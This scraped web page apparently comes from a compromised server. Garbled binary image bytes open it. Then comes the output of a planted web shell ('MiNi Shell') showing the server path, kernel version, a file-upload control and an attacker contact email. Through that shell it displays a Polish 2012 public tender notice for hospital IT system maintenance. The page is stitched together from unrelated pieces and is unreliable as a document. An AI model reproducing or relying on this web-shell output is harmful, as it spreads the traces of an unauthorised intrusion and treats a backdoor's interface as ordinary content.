JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/490494-N-2012.html

<p class="kh_header"><b>Warszawa: Obsługa systemu informatycznego Międzyleskiego Szpitala Specjalistycznego w Warszawie.</b><br>
<b>Numer ogłoszenia: 490494 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzyleski Szpital Specjalistyczny w Warszawie , ul. Bursztynowa 2, 04-749 Warszawa, woj. mazowieckie, tel. 022 4735145, faks 022 6131992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mssw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa systemu informatycznego Międzyleskiego Szpitala Specjalistycznego w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa modułów informatycznych Systemu Infomedica i obsługa systemu informatycznego Zamawiającego przez okres 12 miesięcy w zakresie:
1Objęcia nadzorem autorskim oprogramowania aplikacyjnego InfoMedica,  
2Wykonania kompleksowego przeglądu użytkowanego systemu informatycznego InfoMedica, wykonania jego niezbędnej rekonfiguracji oraz niezbędnego wdrożenia,
3Dostawa i uruchomienia modułów związanych  z planowaną przez szpital rozbudową systemu informatycznego.
4Bieżącego administrowania oprogramowaniem aplikacyjnym InfoMedica 
5Terminy realizacji poszczególnych punktów zakresu przedmiotu zamówienia
Szczegółowy zakres zamówienia:
Nadzór Autorski nad oprogramowaniem aplikacyjnym InfoMedica:
Nadzór autorski uprawnia Zamawiającego do otrzymywania aktualizacji użytkowanego oprogramowania aplikacyjnego do wymogów wynikających ze zmieniających się przepisów ogólnych, rozporządzeń, ustaw, obowiązujących wykładni prawa lub wskazówek jednostek nadrzędnych np. Narodowego Funduszu Zdrowia, Ministerstwa Zdrowia, Wydziałów Zdrowia Urzędu Wojewódzkiego, Urzędu Marszałkowskiego,  i innych, w tym wymogów Zamawiającego.
Przekazywanie Zamawiającemu informacji o nowych wersjach oprogramowania, oraz przekazywanie informacji o planowanych zmianach włącznie z opisem zmian jak i również o zmianach w oprogramowaniu po wykonaniu poprawek wynikających z błędów w modułach. 
Z tytułu realizacji nadzoru autorskiego w stosunku do użytkowanego oprogramowania Wykonawca zapewni:
Udostępnienie poprawek oraz aktualizację oprogramowania aplikacyjnego, w przypadku stwierdzenia przez Zamawiającego błędu użytkowanego oprogramowania aplikacyjnego tzn. nie spowodowanego przez Zamawiającego powtarzalnego działania oprogramowania, w tym samym miejscu programu, prowadzącego w każdym przypadku do otrzymania błędnych wyników jego działania: 
W przypadku tzw. błędu krytycznego, tj. takiego, który uniemożliwia użytkowanie oprogramowania aplikacyjnego w zakresie jego podstawowej funkcjonalności (wskazanej w dokumentacji użytkownika), a w szczególności nieprawidłowe działanie oprogramowania aplikacyjnego, które prowadzi do zatrzymania jego eksploatacji, utraty danych lub naruszenia ich spójności w wyniku której, niemożliwe jest prowadzenie działalności z użyciem wskazanego wyżej oprogramowania:
czas reakcji Wykonawcy na zgłoszenie Zamawiającego (tj. czas od otrzymania zgłoszenia do chwili podjęcia przez Wykonawcę czynności zmierzających do naprawy zgłoszonego błędu krytycznego wynosi 1dzień roboczy.
czas dokonania i zainstalowania udostępnienia Zamawiającemu odpowiednich korekt oprogramowania aplikacyjnego wyniesie 3 dni robocze, od chwili wpłynięcia zgłoszenia. 
w przypadku wystąpienia błędu krytycznego Wykonawca może wprowadzić tzw. rozwiązanie tymczasowe, doraźnie rozwiązujące problem błędu krytycznego - w takim przypadku dalsza obsługa usunięcia dotychczasowego błędu krytycznego będzie traktowana jako błąd zwykły.
Wykonawca odpowiada za konfigurację oraz bezpieczeństwo zdalnego dostępu do baz danych.
Wykonawca odpowiada za bezpieczeństwo danych zawartych  w bazie.
W pozostałych przypadkach:
czas reakcji Wykonawcy na zgłoszenie Zamawiającego (tj. czas od otrzymania zgłoszenia do chwili podjęcia przez Wykonawcę czynności zmierzających do naprawy zgłoszonego błędu zwykłego) wynosi maksymalnie 5 dni roboczych;
czas dokonania i udostępnienia Zamawiającemu odpowiednich korekt oprogramowania aplikacyjnego wyniesie do 30 dni roboczych od chwili wpłynięcia zgłoszenia.
w wyjątkowych wypadkach, za zgodą Zamawiającego, czas dokonania korekt będzie uzgodniony pomiędzy Wykonawcą i Zamawiającym. 
Przyjmowanie i rozpatrywanie indywidualnych uwag w stosunku do użytkowanego przez Zamawiającego oprogramowania aplikacyjnego oraz propozycji jego udoskonaleń. Zasady realizacji zgłoszonych propozycji będą każdorazowo uzgadniane pomiędzy Wykonawcą i Zamawiającym
Udostępni i umożliwi współpracę systemu i baz danych z innymi produktami (innych producentów) które są niezbędne do zabezpieczenia funkcjonowania szpitala, w tym odpowiednie hasła,  uprawnienia i protokóły, np. XML, HTML, XL7.
Zgłoszenia Zamawiającego będą przyjmowanie drogą elektroniczną, w tym poprzez witrynę internetową, pocztą elektroniczną, telefonicznie, lub faxem.
Wykonanie przeglądu obecnej konfiguracji systemu informatycznego Zamawiającego w następującym zakresie:
Inwentaryzacja stanu obecnego systemu informatycznego funkcjonującego u Zamawiającego, obejmującego sprzęt, oprogramowanie i organizację systemu.
Przygotowanie raportu opisującego stan obecny
Przygotowanie koncepcji szpitalnego systemu informatycznego w zakresie docelowym
Przygotowanie i wdrożenie założeń usprawniających i korygujących funkcjonowanie systemu informatycznego
Wykonanie niezbędnych doszkoleń użytkowników w słabych obszarach 
Dostawa i uruchomienie modułów obejmujące konfigurację i szkolenia w zakresie planowanej przez Zamawiającego rozbudowy systemu informatycznego tj. 
dostawa i wdrożenie modułu stymulator JGP
Szkolenia użytkowników modułu
dostawa i wdrożenie modułu patomorfologia
Szkolenia użytkowników modułu
Konfiguracja systemu zleceń (procesy wymiany danych, konfiguracja elementów leczenia) - oba moduły
Szkolenia ze zleceń na oddziałach
Administrowanie oprogramowaniem aplikacyjnym InfoMedica w zakresie następujących modułów:
Moduł Finansowo Księgowy  z Rejestrem VAT i Rejestrem Bankowym,
Moduł Rejestr Sprzedaży,
Moduł Koszty,
Moduł Wycena Kosztów Normatywnych Świadczeń,
Moduł Kadry,
Moduł Płace,
Moduł Grafiki,
Moduł Gospodarka Magazynowa,
Moduł Środki Trwałe,
Moduł Wyposażenie,
Moduł Obsługa Kasy,
Moduł Ruch Chorych (Izba Przyjęć, Oddział, Statystyka Medyczna, Obsługa Kontraktów),
Moduł Apteka Szpitalna,
Moduł Apteczka Oddziałowa,
Moduł Pracownia Diagnostyczna,
Moduł Zlecenia,
Moduł Przychodnia Przyszpitalna,
Moduł Laboratorium z Mikrobiologią
Moduł Administratorski
Moduł Rehabilitacja 
Moduł Dializy 
Moduł Budżetowanie  
Kalkulacja Kosztów Leczenia 
Moduł Blok Operacyjny 
Moduł  stymulator JGP
Moduł Patomorfologia 
Zasady świadczenia usług serwisowych:
Wykonywanie usług zdalnych, udzielanie konsultacji telefonicznych w dni robocze od godziny 8.00 do 16.00  w  wymiarze do 24 godzin w miesiącu.
Przy wykonywaniu usług zdalnych w dzień roboczy w godzinach 16.00 do 8.00 roboczogodzinę liczy się podwójnie.
Przy wykonywaniu usług zdalnych w dzień świąteczny roboczogodzinę liczy się potrójnie.
Rozliczenie roboczogodzin usług zdalnych następuję w okresie trwania umowy do ilości limitu umownego  roboczogodzin.
Wykonanie do 3 wizyt (po 6 godzin) w miesiącu w dni robocze w siedzibie Zamawiającego  z możliwością zamiany przez Zamawiającego na prace zdalne.
Przy wykonywaniu wizyt serwisowych w dzień roboczy w godzinach 16.00 do 8.00 roboczogodzinę liczy się podwójnie.
Przy wykonywaniu wizyt serwisowych w dzień świąteczny roboczogodzinę liczy się potrójnie.
Rozliczenie roboczogodzin wizyt serwisowych następuję w okresie trwania umowy do ilości limitu umownego roboczogodzin.
Instalacja nowych wersji modułów oprogramowania aplikacyjnego.
Administrowanie  bazą danych Oracle, w tym odpowiedzialność za bezpieczeństwo danych.
Instalacja i konfiguracja oprogramowania aplikacyjnego na wskazanych przez Zamawiającego stacjach roboczych i serwerach. 
Dostosowywanie konfiguracji oprogramowania aplikacyjnego do potrzeb Zamawiającego,
Pomoc w definiowaniu szablonów, sprawozdań, słowników itp.. 
udzielanie, w razie potrzeby, instrukcji w zakresie przygotowania różnorodnych raportów, sprawozdań, wg. potrzeb użytkownika; 
Konsultacje uzupełniające, pomoc użytkownikom w obsłudze oprogramowania aplikacyjnego; 
Obsługa zgłoszeń serwisowych realizowana ma być za pomocą systemu zgłaszania  Wykonawcy, w tym poczta elektroniczna, telefon, fax.
Zgłoszenia serwisowe mogą być składane przez upoważnionych użytkowników modułów oraz Informatyków z szpitala  w dni robocze w godzinach 8.00-16.00;
Wykonawca bez zbędnej zwłoki przystępuje do realizacji zgłoszenia;
Obsługa konsultacji telefonicznych (hot-line) z wyznaczonymi przez upoważnionych użytkowników modułów 
Doradztwo w zakresie rozbudowy środków informatycznych;
Obsługa sytuacji awaryjnych (całkowitego zatrzymania systemu) na następujących zasadach:
Sytuację awaryjne  będą zgłaszane poprzez system zgłaszania awarii, pocztę elektroniczną lub telefon przez upoważnionych pracowników szpitala
Wykonawca będzie obsługiwał awarię 24 godz. -7 dni w tygodniu w zakresie baz danych oraz aplikacji,.  Jest odpowiedzialny za konfigurację  i bezpieczeństwo zdalnego dostępu do baz danych (Zamawiający zapewni fizyczne funkcjonowanie sprzętu informatycznego i infrastruktury teleinformatycznej pozwalającej na zdalny dostęp do systemu informatycznego) 
Czas reakcji Wykonawcy w sytuacjach awaryjnych tj. całkowitego zatrzymania systemu - max. 2 godzina,
Rozpoczęcie działań zdalnych Wykonawcy w sytuacjach awaryjnych - max. 4 godziny 
Rozpoczęcie działań Wykonawcy w sytuacjach awaryjnych  na terenie szpitala jeśli jest to jedyny sposób rozwiązania problemu  - na następny dzień roboczy, jeżeli wyczerpanie limitu  czasu (łącznie) na działania określone w  punkcie  powyżej  i punkcie powyżej nastąpiło po godzinie 15:00, chyba że Zamawiający w ramach przysługującego mu prawa zażąda wykonania usługi serwisowej w godzinach 
                       nocnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1 stałym dostępem do aktualizacji systemu InfoMedica w celu wcześniejszego 	zapoznania się ze zmianami w oprogramowaniu oraz ewentualnym (w	przypadku istotnych zmian oprogramowania) przygotowaniu szkoleń dla Pracowników Zamawiającego 
2. stałym, nieograniczonym dostępem do wsparcia technicznego producenta 
oprogramowania w celu: bieżącej współpracy nad rozwiązywaniem problemów wynikających z częstych zmian przepisów prawa oraz zmian w sposobie rozliczania kontraktów z NFZ, szybkiego diagnozowania i skutecznego eliminowania ewentualnych błędów w funkcjonowaniu systemu  InfoMedica. 
Ocena warunku będzie się odbywać na zasadzie spełnia/ nie spełnia. Wykonawca, który wykaże dysponowanie potencjałem technicznym  - spełni; brak wykazania spełnienia warunków - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. przynajmniej dwoma osobami posiadającymi właściwe kwalifikacje i doświadczenie oświadczenie  w zakresie instalowania, wdrażania, serwisowania oraz szkolenia użytkowników dla następujących modułów systemu InfoMedica: Kadry i Płace, Finanse i Księgowość, Gospodarka Materiałowa, Środki trwałe i Wyposażenie. Wykonawca złoży dokumenty potwierdzające kwalifikacje tych osób np. aktualny certyfikat wystawiony przez producenta oprogramowania lub referencje potwierdzone przez inny szpital, że dana osoba posiada w/w doświadczenie oraz że wykonywała usługi instalowania, wdrażania, serwisowania oraz szkolenia użytkowników przez  ostatnie 3 lata lub dokument równoważny potwierdzający kwalifikacje tych osób.
2 przynajmniej trzema osobami posiadającymi właściwe kwalifikacje i                         doświadczenie  w zakresie instalowania, wdrażania, serwisowania oraz szkolenia użytkowników dla następujących modułów systemu InfoMedica: Ruch Chorych, Apteka i Apteczka Oddziałowa, Przychodnia, Blok Operacyjny. Wykonawca złoży dokumenty potwierdzające kwalifikacje tych osób np. aktualny certyfikat wystawiony przez producenta oprogramowania lub referencje potwierdzone przez inny szpital że dana osoba posiada w/w doświadczenie oraz że wykonywała usługi instalowania, wdrażania, serwisowania oraz szkolenia użytkowników przez ostatnie 3 lata lub dokument równoważny potwierdzający kwalifikacje tych osób.
Ocena warunku będzie się odbywać na zasadzie spełnia/ nie spełnia. Wykonawca, który wykaże dysponowanie osobami zdolnymi do wykonania zamówienia - spełni; brak wykazania spełnienia warunków - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min.  500 000,00 zł.
Ocena warunku będzie się odbywać na zasadzie spełnia/ nie spełna. Posiada polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony na kwotę min. 500 000,00 zł spełnia; brak dokumentu potwierdzającego - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony  Formularz Ofertowy stanowiący Załącznik Nr 2 do niniejszej specyfikacji
2.	Oświadczenie wykonawcy, że spełnia warunki określone przepisami art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych, zgodne ze  wzorem stanowiącym Załącznik   Nr 3 do siwz.
3. Dokument potwierdzający, że Wykonawca dysponuje (lub pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy) stałym dostępem do aktualizacji systemu InfoMedica w celu wcześniejszego zapoznania się ze zmianami w oprogramowaniu oraz ewentualnym (w przypadku istotnych zmian oprogramowania) przygotowaniu szkoleń dla Pracowników Zamawiającego 
4. Dokument potwierdzający, że Wykonawca dysponuje (lub pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy stałym, nieograniczonym dostępem do wsparcia technicznego producenta oprogramowania w celu: bieżącej współpracy nad rozwiązywaniem problemów wynikających z częstych zmian przepisów prawa oraz zmian w sposobie rozliczania kontraktów z NFZ, szybkiego diagnozowania i skutecznego eliminowania ewentualnych błędów w funkcjonowaniu systemu  InfoMedica.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Wszelkie zmiany i uzupełnienia do niniejszej umowy mogą być dokonane za zgodą obustronną wyrażoną na piśmie pod rygorem nieważności.
2)	Strony dopuszczają możliwość zmian umowy w następujących przypadkach:
a)	Zmiana stron umowy.
b)	Zmiana banków lub numerów kont bankowych stron.
c)	Zmiana stawek podatku VAT - cena netto nie ulega zmianie, nastąpi jedynie zmiana ceny brutto
d)	Dopuszcza się zmianę zasad administrowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mssw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzyleski Szpital Specjalistyczny w Warszawie 
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 10:00, miejsce: Kancelaria Międzyleskiego Szpitala Specjalistycznego w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com